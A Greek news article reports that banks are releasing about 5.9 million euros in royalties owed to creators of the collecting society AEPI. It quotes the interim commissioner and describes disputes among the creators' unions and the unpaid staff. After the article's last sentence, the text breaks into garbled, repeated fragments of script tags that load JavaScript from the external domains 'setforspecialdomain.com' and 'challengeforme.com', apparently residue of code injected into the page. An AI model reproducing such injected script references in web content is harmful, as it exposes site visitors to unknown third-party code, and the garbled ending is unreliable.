Πάνε ταμείο οι δημιουργοί

Μεγάλη ανακούφιση για τους Ελληνες και τις Ελληνίδες δημιουργούς, συνθέτες και στιχουργούς, αποτελεί η χθεσινή εξέλιξη με τις τράπεζες, που θα επιτρέψουν τελικά την αποδέσμευση 5.888.310 ευρώ (που αποτελούν χρήματα των ιδίων), ώστε να γίνει η διανομή των πνευματικών δικαιωμάτων.

Μετά την κατάθεση και ψήφιση της τροπολογίας για το ακατάσχετο, η προσωρινή επίτροπος Μαριάνθη Βλάχου, με μεθοδικότητα και συνεχείς επαφές με τους ενδιαφερομένους (εποπτικό συμβούλιο της ΑΕΠΙ και τράπεζες), σε χθεσινή ανακοίνωση προς τους δημιουργούς αναφέρει:

«Μετά την απόφαση για το ακατάσχετο των συγκεκριμένων λογαριασμών και αφού στη συνέχεια αντιμετωπίστηκαν, με σειρά ενεργειών μας, προβλήματα και προσκόμματα που έθετε η διοίκηση της ΑΕΠΙ και οι τράπεζες, φτάσαμε σήμερα να καταφέρουμε να διανεμηθούν τα δικαιώματά σας στο ύψος του διαθέσιμου ποσού που επαρκεί προς τον σκοπό αυτόν. Είναι πάγια θέση μας η άσκηση των κατά νόμον αρμοδιοτήτων μας να γίνεται με διαφάνεια, λογοδοσία και παροχή ικανοποιητικής πληροφόρησης προς τα μέλη-δικαιούχους της ΑΕΠΙ, ώστε να εξάγουν τα συμπεράσματά τους έχοντας στη διάθεσή τους όλα τα δεδομένα».

Σύμφωνα με την επίτροπο, στη διάρκεια της θητείας της οι εισπράξεις από δικαιώματα κάλυψαν το 41% των πληρωμών της Διανομής Α’ εξαμήνου 2017, καθ’ όσον το αντίστοιχο ποσό δεν υπήρχε στο Ταμείο της εταιρείας τον Μάιο 2017 οπότε και ανέλαβε η ίδια, ενώ παράλληλα αντιμετωπίστηκαν και τα τρέχοντα λειτουργικά έξοδα.

Επισημαίνει ακόμα:

«Αντιμετωπίσαμε, με σειρά ενεργειών, την καταγγελία της σύμβασης δανείου από την τράπεζα Eurobank-Ergasias Α.Ε., το οποίο δάνειο -σημειωτέον- είχε ληφθεί από την ΑΕΠΙ για να καταβάλει εισπραγμένα δικαιώματά σας της διανομής του β’ εξαμήνου 2016, αλλά μόλις σήμερα κατέστη δυνατόν να επιτευχθεί η αποδέσμευση από τις τράπεζες και των αποδεσμευμένων ποσών από το Δημόσιο, καθόσον η τράπεζα είχε επιβάλει κατάσχεση στα χέρια τρίτων, ήτοι σε όλα τα πιστωτικά ιδρύματα. Από τα παραπάνω γίνεται αντιληπτό ότι ο “γόρδιος δεσμός”, απόρροια των συσσωρευμένων προβλημάτων της εταιρείας, δεν λύνεται εύκολα και επιφέρει αλυσιδωτές συνέπειες, που, για να αντιμετωπιστούν, χρειάζεται να αναληφθεί σειρά πρωτοβουλιών, ενεργειών και αποφάσεων, στις οποίες προβήκαμε για την υπεράσπιση των δικαιωμάτων σας, χωρίς να υπολογίσουμε κόπο και δικαστικά έξοδα, που βάρυναν τον προϋπολογισμό για την υποβοήθηση του έργου του επιτρόπου και όχι την ΑΕΠΙ Α.Ε.».

Στη συνέχεια αναφέρει τον τρόπο με τον οποίο θα διανεμηθούν τα χρήματα αυτά, διαπιστώνοντας επιπλέον πως το σύνολο σχεδόν των δημιουργών ικανοποιήθηκε με τη συγκεκριμένη εξέλιξη.

Η ανακοίνωση αναφέρεται αναλυτικά στην εξόφληση χρημάτων στις 6.182 δικαιούχους δημιουργούς και σε 459 δικαιούχους που λαμβάνουν ποσοστιαία διανομή, επισημαίνοντας ότι σχετικά με τον τρόπο διανομής και την εκκαθάριση δικαιωμάτων ήταν υποχρεωμένη να ακολουθήσει τον ισχύοντα κανονισμό διανομής της εταιρείας.

Την αρμοδιότητα στον τρόπο διανομής έχει αποκλειστικά το Εποπτικό Συμβούλιο.

Θυμίζουμε εδώ ότι οι δημιουργοί (μέλη της ΑΕΠΙ) έχουν χωριστεί σε 4 ξεχωριστά σωματεία (ΣΩΜΣΕ, Ασμα, Μέτρον και Υπέρβαση), που εκπροσωπούνται με μέλη τους στο Εποπτικό Συμβούλιο.

Οι διαφωνίες και οι διαφορές μεταξύ τους, κυρίως ως προς την αντιμετώπιση της ποινικά ελεγχόμενης ιδιοκτησίας της μητρικής εταιρείας και των θυγατρικών εταιρειών της οικ. Ξανθόπουλου, είναι ορατές, όπως ορατές είναι και οι διαφωνίες στον τρόπο διαχείρισης των δυσεπίλυτων προβλημάτων.

Ακούγεται πολύ συχνά από ορισμένους το δίλημμα «πτωχευτικός κώδικας ή συμβιβασμός με τη διοίκηση;» η οποία διοίκηση ωστόσο συσσώρευσε εκατομμύρια ευρώ ζημιά στην εταιρεία, δηλαδή στα κεφάλια των δημιουργών και των εργαζομένων.

Θυμίζουμε εδώ ότι, μετά την κατάθεση, στα τέλη Δεκέμβρη, της τροπολογίας για το ακατάσχετο, άνοιξε ο δρόμος της αποδέσμευσης των τραπεζικών λογαριασμών της ΑΕΠΙ, ώστε να πληρωθούν τα πνευματικά δικαιώματα που ανήκουν στους δικαιούχους δημιουργούς.

Σύμφωνα δε με την τότε ανακοίνωση του υπουργείου Πολιτισμού, «οι λογαριασμοί αυτοί αποτελούνται αποκλειστικά από εισπράξεις πνευματικών δικαιωμάτων που ανήκουν στους δικαιούχους-μέλη της ΑΕΠΙ Α.Ε., όπως προκύπτει από το πόρισμα της ελεγκτικής εταιρείας, αλλά και από τον έλεγχο και τα ευρήματα της προσωρινής επιτρόπου της ΑΕΠΙ Α.Ε., η οποία θα διαχειριστεί με τρόπο διαφανή και αντικειμενικό τη διανομή τους σε όλους τους δικαιούχους-μέλη της ΑΕΠΙ Α.Ε.».

Η διοίκηση

Την επόμενη ημέρα, το σωματείο Ασμα 450+ (εκπροσωπεί σήμερα την πλειοψηφία των μελών της ΑΕΠΙ) συνεχάρη την κυβέρνηση που άκουσε τα αιτήματα και την αγωνία των απλήρωτων δημιουργών.

Απλήρωτοι εξαιτίας της διοίκησης της ΑΕΠΙ, που παραμένει στη θέση της και επιμένει, ακόμα και σήμερα, να αξιοποιεί τα όποια έσοδα από τα δικαιώματα για λειτουργικά της έξοδα και τις συνδεδεμένες της εταιρείες.

Στις 29/12/2017, με νέα ανακοίνωση το Ασμα 450+ προχωρούσε σε καταγγελία, σύμφωνα με την οποία η ιδιοκτησία της εταιρείας έβαζε εμπόδια στη διαδικασία με τις τράπεζες.

Παράλληλα, κατήγγειλε ότι η διοίκηση είχε επιλέξει να ενημερώνει μόνο ένα από τα σωματεία που απαρτίζουν το σύνολο των δημιουργών (μελών της ΑΕΠΙ) και καλούσε το συγκεκριμένο σωματείο -Μέτρον- να πάψει να δέχεται επιλεκτική μεταχείριση, καλώντας ταυτόχρονα ένα προς ένα τα μέλη του εποπτικού συμβουλίου να επιτελέσουν τον ρόλο τους και να πιέσουν επιτέλους αποτελεσματικά τη διοίκηση για τον απαραίτητο διαχωρισμό των λογαριασμών, της εταιρείας, ώστε να διακριθεί η προμήθεια της ΑΕΠΙ από το ποσό που αντιστοιχεί στα δικαιώματα των δημιουργών.

Σημειωτέον, υπάρχει σοβαρή πιθανότητα, για πρώτη φορά στην ιστορία της εταιρείας, οι υπάλληλοι της ΑΕΠΙ να μην πληρωθούν τον μισθό του Ιανουαρίου.

Η διοίκηση της εταιρείας δηλώνει αδυναμία καταβολής και η αναστάτωση είναι πολύ μεγάλη.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >